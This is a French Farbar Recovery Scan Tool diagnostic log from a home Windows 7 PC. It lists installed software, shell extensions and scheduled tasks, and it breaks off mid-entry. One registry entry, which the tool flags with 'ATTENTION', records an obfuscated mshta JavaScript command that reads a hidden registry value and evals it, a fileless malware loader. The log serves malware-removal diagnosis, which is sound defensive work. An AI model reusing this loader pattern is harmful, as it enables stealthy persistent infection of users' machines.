Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x86) Version: 18-07-2017 Exécuté par Martine (22-07-2017 21:08:33) Exécuté depuis C:\Users\Martine\Contacts\Desktop Microsoft Windows 7 Édition Familiale Premium Service Pack 1 (X86) (2009-12-28 10:22:55) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-139836275-4246878868-498758953-500 - Administrator - Disabled) => C:\Users\Administrateur HomeGroupUser$ (S-1-5-21-139836275-4246878868-498758953-1372 - Limited - Enabled) Invité (S-1-5-21-139836275-4246878868-498758953-501 - Limited - Enabled) Martine (S-1-5-21-139836275-4246878868-498758953-1000 - Administrator - Enabled) => C:\Users\Martine ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) Acer Arcade Deluxe (HKLM\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 2.5.6121 - CyberLink Corp.) Hidden Acer Arcade Deluxe (HKLM\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 2.5.6121 - CyberLink Corp.) Acer Backup Manager (HKLM\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 1.0.0.58 - NewTech Infosystems) Acer Crystal Eye webcam Ver:1.1.74.216 (HKLM\...\{D0ACE89D-EC7F-470F-80BE-4C98ED366B32}) (Version: 1.1.74.216 - Chicony Electronics Co.,Ltd.) Acer GridVista (HKLM\...\GridVista) (Version: 2.72.317 - ) Acer PowerSmart Manager (HKLM\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 4.06.3005 - Acer Incorporated) Acer Product Registration (HKLM\...\{DA20E1A8-07CB-4EE7-9B72-A7E28C953F0E}) (Version: 3.0.0.10 - Acer Incorporated) Acer ScreenSaver (HKLM\...\Acer Screensaver) (Version: 1.0.0.0226 - Acer) Acronis True Image Home (HKLM\...\{633A06C3-B709-479A-AAB3-5EE94AD9EE4B}) (Version: 11.0.8084 - Acronis) Adobe Acrobat Reader DC - Français (HKLM\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated) Adobe Flash Player 26 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 26.0.0.131 - Adobe Systems Incorporated) Adobe Flash Player 26 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 26.0.0.137 - Adobe Systems Incorporated) Aiseesoft Convertisseur Média Ultime 6.3.58 (HKLM\...\{5FA3097C-03C5-492e-ACF0-9924A56985C2}_is1) (Version: 6.3.58 - Aiseesoft Studio) Aiseesoft Convertisseur Vidéo Total Platinum 6.3.26 (HKLM\...\{3661F243-518C-4d05-8BDF-7B10CC22689F}_is1) (Version: - ) Aiseesoft Screen Recorder 1.1.8 (HKLM\...\{DD85E531-C84E-4247-B7A3-5F0C22D276DB}_is1) (Version: 1.1.8 - Aiseesoft Studio) Amazon Kindle (HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\Amazon Kindle) (Version: - Amazon) ANT Drivers Installer x86 (HKLM\...\{0F6BB028-6A31-4E31-9738-08E1E18125B5}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden ANT Drivers Installer x86 (HKLM\...\{5E58CA93-ABA0-4CDB-9E37-6C88A795C86E}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden ANT Drivers Installer x86 (HKLM\...\{E64F69D8-38FE-48B8-95AB-CC676FA636F1}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden Apowersoft Enregistreur d'écran Pro V2.1.1 (HKLM\...\{dc9006db-6b05-4f0f-833b-79ef3f284c24}_is1) (Version: 2.1.1 - APOWERSOFT LIMITED) Apple Application Support (32 bits) (HKLM\...\{E92BB800-BCC5-4C25-8102-AC2C3B7C7C1E}) (Version: 5.5 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2A2C8640-5402-428A-909A-0236CB2B77C7}) (Version: 10.3.2.3 - Apple Inc.) Apple Software Update (HKLM\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.) Avast Antivirus Gratuit (HKLM\...\Avast Antivirus) (Version: 17.5.2303 - AVAST Software) Backup Manager Basic (HKLM\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 1.0.0.58 - NewTech Infosystems) Hidden Bejeweled 2 Deluxe (HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\Bejeweled 2 Deluxe) (Version: 1.0.0 - Zylom Games) CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform) CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.2.4478 - CDBurnerXP) Ciel Compta 15.10 (HKLM\...\{E0343115-DC69-4F05-BADC-FE8F45DEFC0A}) (Version: 230.00.235 - Ciel) CodeTwo QR Code Desktop Reader (HKLM\...\{8E03824D-0FCC-4AAE-BBE3-3B544BE3876F}) (Version: 1.0.0 - CodeTwo) ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version: - DownloadHelper) D3DX10 (HKLM\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 4.48.1.0347 - Disc Soft Ltd) Dropbox (HKLM\...\Dropbox) (Version: 30.4.22 - Dropbox, Inc.) Dropbox Update Helper (HKLM\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden Elevated Installer (HKLM\...\{1052502B-4C91-43F9-B160-AE39ED57C9F0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Étude pour l'amélioration du produit HP ENVY 4500 series (HKLM\...\{473786F1-FBD9-44E9-8BC8-A161226DF847}) (Version: 32.1.145.46951 - Hewlett-Packard Co.) Fmrid 4.0 (HKLM\...\Fmrid) (Version: 4.0 - Fabio Chelly) Galerie de photos Windows Live (HKLM\...\{488F0347-C4A7-4374-91A7-30818BEDA710}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Garmin Communicator Plugin (HKLM\...\{71DBFBF2-F7EB-4268-8485-9471D83C4E66}) (Version: 4.2.0 - Garmin Ltd or its subsidiaries) Garmin Express (HKLM\...\{BCC7CA85-E57F-452D-BB44-15A1CE018BD0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Garmin Express (HKLM\...\{bd8bd200-9a60-4969-b267-6b565f36e3da}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Garmin Express Tray (HKLM\...\{DA9C865D-6762-4931-8588-0B13B7A0796B}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden Garmin USB Drivers (HKLM\...\{65F9E1F3-A2C1-4AA9-9F33-A3AEB0255F0E}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries) Google Photos Backup (HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.) Google Update Helper (HKLM\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden HP ENVY 4500 series Aide (HKLM\...\{BAF28CCD-121D-4C6C-B29D-4F7B51B2D1B4}) (Version: 30.0.0 - Hewlett Packard) HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1892 - Intel Corporation) Intel(R) TV Wizard (HKLM\...\TVWiz) (Version: - Intel Corporation) iTunes (HKLM\...\{28ECFB1B-6B8C-41D5-B5EF-87494A77C6C8}) (Version: 12.6.1.25 - Apple Inc.) Junk Mail filter update (HKLM\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Kerish Doctor 2017 (HKLM\...\{EF70A54F-E09E-4570-8F21-C7674CDDB5B6}_is1) (Version: 4.65 - Kerish Products) K-Lite Mega Codec Pack 8.8.0 (HKLM\...\KLiteCodecPack_is1) (Version: 8.8.0 - ) Launch Manager (HKLM\...\LManager) (Version: 3.0.03 - Acer Inc.) Logiciel de base du périphérique HP ENVY 4500 series (HKLM\...\{6550C7C8-C1A4-4581-9CFE-833ECAC25CE4}) (Version: 32.1.145.46951 - Hewlett-Packard Co.) MFCDLL Shared Library - Retail Version (HKLM\...\{51D569E2-8A28-11D2-B962-006097C4DE24}) (Version: 6.0.8665.0 - Unknown) Hidden Microsoft .NET Framework 4.7 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.7.02053 - Microsoft Corporation) Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation) Microsoft Money (HKLM\...\Money2005b) (Version: 14 - Microsoft) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Works (HKLM\...\{0214A441-A4AB-43A8-8DEF-2F73C5364673}) (Version: 9.7.0621 - Microsoft Corporation) Mise à jour Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-040C-0000-0000000FF1CE}_PROPLUS_{B761869A-B85C-40E2-994C-A1CE78AC8F2C}) (Version: - Microsoft) Mise à jour Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-040C-0000-0000000FF1CE}_PROPLUS_{51EFB347-1F3D-4BAC-8B79-F056B904FE21}) (Version: - Microsoft) Mise à jour Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-040C-0000-0000000FF1CE}_PROPLUS_{C3DCA38E-005E-41BA-A52A-7C3429F351C3}) (Version: - Microsoft) Mise à jour Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-040C-0000-0000000FF1CE}_PROPLUS_{81536A04-DBFB-4DB3-978F-0F284590C223}) (Version: - Microsoft) Module de compatibilité pour Microsoft Office System 2007 (HKLM\...\{90120000-0020-040C-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Module linguistique Microsoft .NET Framework 3.5 SP1- fra (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - fra) (Version: - Microsoft Corporation) Mozilla Firefox 54.0.1 (x86 fr) (HKLM\...\Mozilla Firefox 54.0.1 (x86 fr)) (Version: 54.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0.1.6388 - Mozilla) MSXML 3.0 (HKLM\...\{930E3A4D-70B7-4D0D-AF8D-0B351A9B55BE}) (Version: 8.20.8730.4 - Microsoft Corporation) Hidden MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NTI Backup Now 5 (HKLM\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.616 - NewTech Infosystems) NTI Backup Now Standard (HKLM\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.616 - NewTech Infosystems) Hidden NTI Media Maker 8 (HKLM\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.2.6509 - NewTech Infosystems) Hidden NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.2.6509 - NewTech Infosystems) Orion (HKLM\...\{5B63A470-9334-44D1-AF61-6CE2DB565AE9}) (Version: 2.5.0 - Convesoft) Package de pilotes Windows - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations) Package de pilotes Windows - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.) Package de pilotes Windows - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software) Paragon Partition Manager™ 15 Home (HKLM\...\{986A654F-F1E4-11DD-9FCA-005056C00008}) (Version: 90.00.0003 - Paragon Software) Partition Suite (HKLM\...\{2300EE96-0A41-4FAB-BD03-989EC44577A0}) (Version: 10.0.2161 - Acronis) PicPick (HKLM\...\PicPick) (Version: 4.2.3 - NGWIN) Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.) Realtek USB 2.0 Card Reader (HKLM\...\{DC24971E-1946-445D-8A82-CE685433FA7D}) (Version: 6.0.6000.20113 - Realtek Semiconductor Corp.) Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform) Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group) SafeZone Stable 1.51.2220.62 (HKLM\...\SafeZone 1.51.2220.62) (Version: 1.51.2220.62 - Avast Software) Hidden SafeZone Stable 1.51.2220.62 (HKLM\...\SafeZone 1.51.2220.621) (Version: 1.51.2220.62 - Avast Software) Hidden SafeZone Stable 3.55.2393.609 (HKLM\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden Sauvegarde des Dossiers personnels Microsoft Outlook (HKLM\...\{C63E7C60-25EB-11D3-8EDA-00A0C911E8E5}) (Version: 1.10.0.0 - Microsoft Corporation) Skype™ 7.38 (HKLM\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.) Streaming Video Recorder V6.0.0 (HKLM\...\{01c39b1f-d465-48ca-9d71-7d5afa53b4eb}_is1) (Version: 6.0.0 - APOWERSOFT LIMITED) TeamViewer 12 (HKLM\...\TeamViewer) (Version: 12.0.75813 - TeamViewer) UBitMenu FR (HKLM\...\{BBFAA659-FC2D-46cc-A8C0-BE0D03560F17}_is1) (Version: 01.04 - UBit Schweiz AG) Unity Web Player (HKLM\...\UnityWebPlayer) (Version: 2.5.1f5_24931 - Unity Technologies ApS) Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Upgrade Kit (HKLM\...\{1D0FDD6D-3C5E-4588-8ED0-02DC88014BF2}) (Version: 1.00.3002 - Acer Inc.) Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player (HKLM\...\VLC media player) (Version: 2.2.6 - VideoLAN) VSDC Free Video Editor version 5.7.7.702 (HKLM\...\VSDC Free Video Editor_is1) (Version: 5.7.7.702 - Flash-Integro LLC) Windows 7 USB/DVD Download Tool (HKLM\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation) Windows Driver Package - Garmin (grmnusb) GARMIN Devices (06/03/2009 2.3.0.0) (HKLM\...\49CF605F02C7954F4E139D18828DE298CD59217C) (Version: 06/03/2009 2.3.0.0 - Garmin) Windows Live (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Windows Live FolderShare (HKLM\...\{2075CB0A-D26F-4DAA-B424-5079296B43BA}) (Version: 14.0.8089.726 - Microsoft Corporation) WinPcap 4.1.1 (HKLM\...\WinPcapInst) (Version: 4.1.0.1753 - CACE Technologies) WinX HD Video Converter Deluxe 5.9.6 (HKLM\...\WinX HD Video Converter Deluxe_is1) (Version: - Digiarty Software, Inc.) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Martine\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> pas de chemin du fichier CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> pas de chemin du fichier CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> pas de chemin du fichier CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\psuser.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{8D9CFB3B-AB70-4FF0-86DB-C85F04FCDBDC}\InprocServer32 -> C:\Users\Martine\AppData\Local\Hook Network\Raccourcis Internet Explorer 9\2.0.0.1\IE9PinnedSitesHelper.dll (Hook Network) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{994B47B9-7DB9-5058-EE22-08DD039ADC4B}\InprocServer32 -> {1874A483-9468-D082-D534-05E985889A47} => Pas de fichier CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{C539A15A-3AF9-4c92-B771-50CB78F5C751}\InprocServer32 -> C:\Program Files\Acronis\TrueImageHome\tishell.dll (Acronis) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{C539A15B-3AF9-4c92-B771-50CB78F5C751}\InprocServer32 -> C:\Program Files\Acronis\TrueImageHome\tishell.dll (Acronis) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{C539A15C-3AF9-4c92-B771-50CB78F5C751}\InprocServer32 -> C:\Program Files\Acronis\TrueImageHome\tishell32.dll (Acronis) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{DD0822EE-9A03-4BDC-B947-4B99B97D5850}\InprocServer32 -> {42197229-9468-D082-7FE2-68B385889A47} => Pas de fichier CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe (Google Inc.) CustomCLSID: HKU\S-1-5-21-139836275-4246878868-498758953-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\psuser.dll (Google Inc.) HKU\S-1-5-21-139836275-4246878868-498758953-1000\Software\Classes\d7ce: "C:\Windows\system32\mshta.exe" "javascript:kkVDmd0P="hAosGG";d8g=new ActiveXObject("WScript.Shell");M0NcyK="OUecR";Q48xEX=d8g.RegRead("HKCU\\software\\hkmndfgdh\\kauji");g7vHaEA="Z0pwVQ";eval(Q48xEX);LIM5C0D="VwSMupY4";" <==== ATTENTION ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-07-18] (AVAST Software) ContextMenuHandlers01: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-07-18] (AVAST Software) ContextMenuHandlers01: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ContextMenuHandlers01: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files\TechSmith\SnagIt 7\SnagItShellExt.dll [2005-10-14] (TechSmith Corporation) ContextMenuHandlers03: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-07-18] (AVAST Software) ContextMenuHandlers04: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ContextMenuHandlers04: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell.dll [2015-04-08] (Piriform Ltd) ContextMenuHandlers04: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files\TechSmith\SnagIt 7\SnagItShellExt.dll [2005-10-14] (TechSmith Corporation) ContextMenuHandlers05: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files\Dropbox\Client\DropboxExt.17.0.dll [2017-07-12] (Dropbox, Inc.) ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-02] (Intel Corporation) ContextMenuHandlers06: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-07-18] (AVAST Software) ContextMenuHandlers06: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell.dll [2015-04-08] (Piriform Ltd) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0B4B31EB-3A0A-4744-BEF1-BDC476ED4671} - System32\Tasks\GlaryInitialize 5 => G:\Programmes portable\Portable\Initialize.exe Task: {0F49ECFE-C3A6-41A3-801E-421D79822CE7} - System32\Tasks\{F3F788D7-8FC2-4F7D-A52A-F6894D286554} => C:\Windows\system32\pcalua.exe -a C:\Users\Martine\Desktop\WIKO_MAJ_CINK_SLIM_V14\Driver\x86\spinstall.exe -d C:\Users\Martine\Desktop\WIKO_MAJ_CINK_SLIM_V14\Driver\x86 Task: {16985409-6E88-4DE3-9D97-24A35D3C8D55} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-07-18] (AVAST Software) Task: {18755DEA-E895-4FD9-92CC-EB9EE113084D} - System32\Tasks\{26FC3E9F-F756-4C4A-8E84-726FD0FB47C8} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {212C6849-A3B0-43E0-87E9-EC49E3254884} - 